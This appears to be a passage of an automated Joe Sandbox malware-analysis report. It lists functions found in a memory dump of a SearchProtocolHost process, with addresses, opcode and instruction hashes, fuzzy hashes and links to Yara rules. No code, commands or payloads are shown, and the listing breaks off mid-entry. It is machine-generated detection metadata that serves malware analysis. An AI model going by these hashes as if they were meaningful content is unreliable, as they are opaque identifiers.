                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03f44466c0ab31493c35a5fb12c474d23d6f69a0de5a5230d1040cd9273f058f
                                                                                      • Instruction ID: 8fa41606e91d3be2596539536f1dcc57b923cd0984b88ef6d746dff48579ca59
                                                                                      • Opcode Fuzzy Hash: 03f44466c0ab31493c35a5fb12c474d23d6f69a0de5a5230d1040cd9273f058f
                                                                                      • Instruction Fuzzy Hash: 1B32DB34A00B588FDB24DFA9C8447BAFBF2BF84700F28456DE6469B784D735A942DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0385124C Relevance: .6, Instructions: 571COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4baf2ebb7743ccdfcb92a2980ab9a0ee927efc09fa17bb581268dd6ba6187c60
                                                                                      • Instruction ID: 777aff601d0625f73c0406d4b0a9ee0c2295d37ed076c3bc50d23b9601c17a07
                                                                                      • Opcode Fuzzy Hash: 4baf2ebb7743ccdfcb92a2980ab9a0ee927efc09fa17bb581268dd6ba6187c60
                                                                                      • Instruction Fuzzy Hash: EB227F35A002168FCF19CF99C494BBAF7F6BF88305F1885A9E855DB345DB34A942CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379D700 Relevance: .3, Instructions: 342COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f13f80ca12b73ca84871a5e3994816466fc71f526c6fef2142e5436b3cd428ff
                                                                                      • Instruction ID: 06b33ba449c88d56f4d7b7c69073836c9d5e40bdfbf2ccdef465a83d5d08c8be
                                                                                      • Opcode Fuzzy Hash: f13f80ca12b73ca84871a5e3994816466fc71f526c6fef2142e5436b3cd428ff
                                                                                      • Instruction Fuzzy Hash: 98C1A275E002159FEF28DB58C844BAEF7B5FF44314F1882AAE925AB381D770E941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D1763 Relevance: .3, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 141e8310cd64c4631e3d2a174db076b289d38b0877ddb9a774a3abd027ba1671
                                                                                      • Instruction ID: c36b3a3ecac7957b454f308386d5fb8c4aad92a85e12ac5c09379c2b7e986668
                                                                                      • Opcode Fuzzy Hash: 141e8310cd64c4631e3d2a174db076b289d38b0877ddb9a774a3abd027ba1671
                                                                                      • Instruction Fuzzy Hash: 35D11475A006049FDB91DFA8C984B9ABBF9BF49310F0841BAED09DF256D731D905CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037AF380 Relevance: .3, Instructions: 321COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9a899fecc5bbb9a685d876fe5b3be2a994b7d68d2124349a2ff11ec83a71241
                                                                                      • Instruction ID: 53554394ea0b33837f539b7fecdec8757c89a253804e0e97885e6c65082bd754
                                                                                      • Opcode Fuzzy Hash: e9a899fecc5bbb9a685d876fe5b3be2a994b7d68d2124349a2ff11ec83a71241
                                                                                      • Instruction Fuzzy Hash: BFC10472A05A20CBDB28DF1CCC907B9B7A5FBC8704F194299E942DF395E7348941CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037937E4 Relevance: .3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27385c0624eea25996b21e602c39ad06e921a5a6e93f095b2e8f2e0a5e164d13
                                                                                      • Instruction ID: 54252b8bab6fb4a399827483afc4b3d9224d40a06f40d65a4b9709e5aed82750
                                                                                      • Opcode Fuzzy Hash: 27385c0624eea25996b21e602c39ad06e921a5a6e93f095b2e8f2e0a5e164d13
                                                                                      • Instruction Fuzzy Hash: FBC165B99007089FEB15DFA9D840AAEBBF4FF48710F15426AE51AEB350E734A901CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037982E0 Relevance: .3, Instructions: 281COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2dd675b0c6bfbfdabc9bda405f958b8a10d01f7e0a007b99905a689deff5a04
                                                                                      • Instruction ID: 719aef956f9aa978d738ae1073b3820cd7c5202287d4a0ed6a3146aaac49773b
                                                                                      • Opcode Fuzzy Hash: a2dd675b0c6bfbfdabc9bda405f958b8a10d01f7e0a007b99905a689deff5a04
                                                                                      • Instruction Fuzzy Hash: 0CC13974208340DFE764CF19C494BAAB7E4BF88344F484A6EE99997391D774E904CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378C3C7 Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da4f2952b80b239b31fb53f7f58281416f37655cf2e61afc89298f4b7f3b1ea4
                                                                                      • Instruction ID: bf1beb5cc9387688c04dd7ea1e33786d45b135cc6ba7e31344ed481850193b45
                                                                                      • Opcode Fuzzy Hash: da4f2952b80b239b31fb53f7f58281416f37655cf2e61afc89298f4b7f3b1ea4
                                                                                      • Instruction Fuzzy Hash: 49B17075A402668BDB75DF64C890BA9F3B5EF44700F1485EAD50AEB280EB349EC5CF21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037BE507 Relevance: .3, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 483bd74e88842aee7c1a8034ccd40f2fb3f73e4f683997768ade8a2deb4abf3c
                                                                                      • Instruction ID: 36eec87fd7269c7640c7a60381884346e371ae2822f17f6efaaebf69c99d456e
                                                                                      • Opcode Fuzzy Hash: 483bd74e88842aee7c1a8034ccd40f2fb3f73e4f683997768ade8a2deb4abf3c
                                                                                      • Instruction Fuzzy Hash: CFA1C871E00715AFEB21DBA8D888BEDB7B4BF05B18F090255EA11AB790DB749D40CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D00A5 Relevance: .3, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad67e1058e67c9ed2f5dec7f0e1bca4e271c62bba374ecc43a8c2aa2547d43ad
                                                                                      • Instruction ID: 3da554651f41ecbdff6c3ddb5e249ef02e470771bab5993cf70bfc414dd4632d
                                                                                      • Opcode Fuzzy Hash: ad67e1058e67c9ed2f5dec7f0e1bca4e271c62bba374ecc43a8c2aa2547d43ad
                                                                                      • Instruction Fuzzy Hash: 91A1DF74B01B069FDB24DFAAC990BAAB7B5FF48314F04506DE905DB291EB34E901CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03864080 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8d9ce51f9da3b21499a057d7e5fe88c22603ab6a743d7434d0a1303cb79e3753
                                                                                      • Instruction ID: 7c3bf5f3b12aabbd7a4dcc2f346f4d71c6bb891eaa00b6f62ae111f98dfb6238
                                                                                      • Opcode Fuzzy Hash: 8d9ce51f9da3b21499a057d7e5fe88c22603ab6a743d7434d0a1303cb79e3753
                                                                                      • Instruction Fuzzy Hash: 15A1CA72604A11AFC721DFA9C980F5EB7E9FF88704F480AA8E589DB651D734EC41CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037AE310 Relevance: .3, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72a362677bedc2b08b394968e448d5ddd536b7fd87cbd47eb2ac321641897f24
                                                                                      • Instruction ID: 5e2399297e916e4a4a7bf1121d354c620cf1bbe039b763d89ed5775519304273
                                                                                      • Opcode Fuzzy Hash: 72a362677bedc2b08b394968e448d5ddd536b7fd87cbd47eb2ac321641897f24
                                                                                      • Instruction Fuzzy Hash: C2910135A00A14CFD724DB6CC884B7EB7B5FBC8710F1942A9EA059FB80E7349941DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037993A6 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b898720688f9f3192da0821627ce289a825e5a3eec3feb8056d0f6142bbff867
                                                                                      • Instruction ID: cded63570d46db825529cd2cab187ff03dec963522605f170a55953bbd5399e9
                                                                                      • Opcode Fuzzy Hash: b898720688f9f3192da0821627ce289a825e5a3eec3feb8056d0f6142bbff867
                                                                                      • Instruction Fuzzy Hash: B0B18B75900606CFFF25DF59E4407AAB7B4BF0A314F18469EDA219B2A6D730D842CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03791051 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12170edbe702192a9d05294e056dd2f23500a06869266268dd193852222c06a2
                                                                                      • Instruction ID: af7198d5074cb97c9a2b2e16a206307b70581a1408a02c010310744c1e6ac0b7
                                                                                      • Opcode Fuzzy Hash: 12170edbe702192a9d05294e056dd2f23500a06869266268dd193852222c06a2
                                                                                      • Instruction Fuzzy Hash: D1B102756093819FD754CF28C480A6AFBF1BF88304F194A6EF8998B352D771E845CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03797290 Relevance: .2, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ec506a48e96b6d487c6821344dc8846f75fe3522575474686c894a77c6756ea
                                                                                      • Instruction ID: b537bdf01b664012e0c11d832366a00c69f361b7aef24d8dee77af2c2b1a2ecf
                                                                                      • Opcode Fuzzy Hash: 2ec506a48e96b6d487c6821344dc8846f75fe3522575474686c894a77c6756ea
                                                                                      • Instruction Fuzzy Hash: A2A17E75614781CFD718DF28D480A2ABBF9FF88704F144A6EE5859B350E730E945CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0384B0AF Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a8e55c5e9bec7b01ab51a7e2cb1e168636d90c3f3db5544ded36e1939b84b3c
                                                                                      • Instruction ID: cd3759d663a6ffd1fb5b576d9ae244855d6bdd9d9a86973de5c0770854da42fc
                                                                                      • Opcode Fuzzy Hash: 6a8e55c5e9bec7b01ab51a7e2cb1e168636d90c3f3db5544ded36e1939b84b3c
                                                                                      • Instruction Fuzzy Hash: 4D71A035A0021E9BCB21CFEAC480ABEF7F9AF84654F5941DAD881EBA44F374D941C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0385A6C0 Relevance: .2, Instructions: 222COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                      • Instruction ID: 09e6239216e1ceda39a2204b5e53a8cf7c0fede0551aea8fa1202573e2564288
                                                                                      • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                      • Instruction Fuzzy Hash: DA816F35A002199FCF19CF98C4C0AAEB7F6BF88214F1982A9EC55DB354D778E906CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0385970B Relevance: .2, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c809ad18292c829f1acdfeb1ba966bf25aad3a4e9b9617d63c0b05a62c0abbb
                                                                                      • Instruction ID: 8c4152905d7a7d5043bb2b3f66c20b112522ead4224f87c2172ceaa91a2ef03d
                                                                                      • Opcode Fuzzy Hash: 0c809ad18292c829f1acdfeb1ba966bf25aad3a4e9b9617d63c0b05a62c0abbb
                                                                                      • Instruction Fuzzy Hash: 61618274B01219DBDB25DFA8C884BBEB7AAAF84314F1841D9FC15EB284DB34D941C791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037AC560 Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f36c9ddef5f130baee1ef9289a4c63e28cfb763acf988b5f613077209125c587
                                                                                      • Instruction ID: 673284949ff9a3072a2aa16960280ba7d8049a2ab09b341f28ea0b8487d7baa2
                                                                                      • Opcode Fuzzy Hash: f36c9ddef5f130baee1ef9289a4c63e28cfb763acf988b5f613077209125c587
                                                                                      • Instruction Fuzzy Hash: 8F71A0B5805A25AFCB25CF5CD9907BDFBB4FF89710F14429AE951AB350E3349801CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A252B Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60c14406effba1080914c1059d4d5336f9a06cbaae5f94e3911a4f0b00cfa3dd
                                                                                      • Instruction ID: 79110848d0ed1b42364358743d6801c6a3ed3933bac81429009f3db37c2366b8
                                                                                      • Opcode Fuzzy Hash: 60c14406effba1080914c1059d4d5336f9a06cbaae5f94e3911a4f0b00cfa3dd
                                                                                      • Instruction Fuzzy Hash: 9A71D135604A419FD311DF2CC884B2AB7E5FFC4700F098AAAE859CB752EB34D945CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03797623 Relevance: .2, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7dbff51a05a19d6120156c88e085e6e35fdf68b343cfcd5c81243fc728f2f067
                                                                                      • Instruction ID: 190ce98b96f32ecbe7b95f4d5fa91360d58686dba1a9ec3741be8d356093a2ec
                                                                                      • Opcode Fuzzy Hash: 7dbff51a05a19d6120156c88e085e6e35fdf68b343cfcd5c81243fc728f2f067
                                                                                      • Instruction Fuzzy Hash: F3614275A10646AFDF1CDF7CD880AADFBB5BF88304F24826ED519A7340DB30A9418B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037977F9 Relevance: .2, Instructions: 164COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b8e5f40fd682d513218687746c4fdde87dfbdefd5d370909e77d73d3afdf757
                                                                                      • Instruction ID: 97253df38d54a701fe5615ab762e3d296007330ca0f67e97631da6665f013a1c
                                                                                      • Opcode Fuzzy Hash: 0b8e5f40fd682d513218687746c4fdde87dfbdefd5d370909e77d73d3afdf757
                                                                                      • Instruction Fuzzy Hash: EB518E70618741DFDB28DF29D08092AFBF9FB88710F544AAEE5999B354D730E844CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378B273 Relevance: .2, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c30c05742b702ef4f40aa6a50bb9c763ddc5642d24e810d0cc4c53310eb480f
                                                                                      • Instruction ID: a5e3bb924476088b955e5390ba607a27768a4b189f90f3e50a20b2c6f71423fb
                                                                                      • Opcode Fuzzy Hash: 9c30c05742b702ef4f40aa6a50bb9c763ddc5642d24e810d0cc4c53310eb480f
                                                                                      • Instruction Fuzzy Hash: 2641F475280B01AFDB26EF59D880B2BBBA9EF88B10F19456EF549DF650D7B0D801CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A3660 Relevance: .2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 195edc9a70ac3ff6f4ab0ac3ba10063ba9292c0f540086c5dcbbc85c9beac9d7
                                                                                      • Instruction ID: 106d2f975e95f17e73422851843e4dca3de36c6a2ed050de4e379a06b898a8ff
